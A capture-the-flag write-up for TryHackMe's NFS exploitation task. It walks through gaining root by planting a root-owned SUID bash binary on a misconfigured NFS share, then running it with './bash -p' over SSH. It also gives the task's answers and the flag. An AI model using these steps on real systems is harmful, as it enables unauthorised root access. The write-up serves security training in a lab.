TryHackMe: Exploiting NFS

This is a write up for the Exploiting NFS task of the Network Services 2 room on TryHackMe. Some tasks have been omitted as they do not require an answer.

---

First, change directory to the mount point on your machine, where the NFS share should still be mounted, and then into the user’s home directory.

cd /tmp/mount/cappucino

Download the bash executable to your Downloads directory. Then use “cp ~/Downloads/bash .” to copy the bash executable to the NFS share. The copied bash shell must be owned by a root user, you can set this using “sudo chown root bash”

wget https://github.com/polo-sec/writing/raw/master/Security%20Challenge%20Walkthroughs/Networks%202/bash -P ~/Downloads
cd /tmp/mount/cappucino
cp ~/Downloads/bash .
sudo chown root bash

Now, we’re going to add the SUID bit permission to the bash executable we just copied to the share using “sudo chmod +[permission] bash”. What letter do we use to set the SUID bit set using chmod?

Set the setuid flag with +s

sudo chmod +s bash
sudo chmod +x bash

Answer: s

Let’s do a sanity check, let’s check the permissions of the “bash” executable using “ls -la bash”. What does the permission set look like? Make sure that it ends with -sr-x.

ls -la bash

Answer: -rwsr-sr-x

Now, SSH into the machine as the user. List the directory to make sure the bash executable is there. Now, the moment of truth. Lets run it with “./bash -p”. The -p persists the permissions, so that it can run as root with SUID- as otherwise bash will sometimes drop the permissions.

ssh -i id_rsa cappucino@<ip>
ls -la

./bash -p

Great! If all’s gone well you should have a shell as root! What’s the root flag?

cat /root/root.txt

Answer: THM{nfs_got_pwned}

Recap

In this task we learnt how to:

• Download and copy a file onto an NFS share
• Reassign permissions via chmod
• Execute SUID Bit Bash Executable in order to gain root access to the machine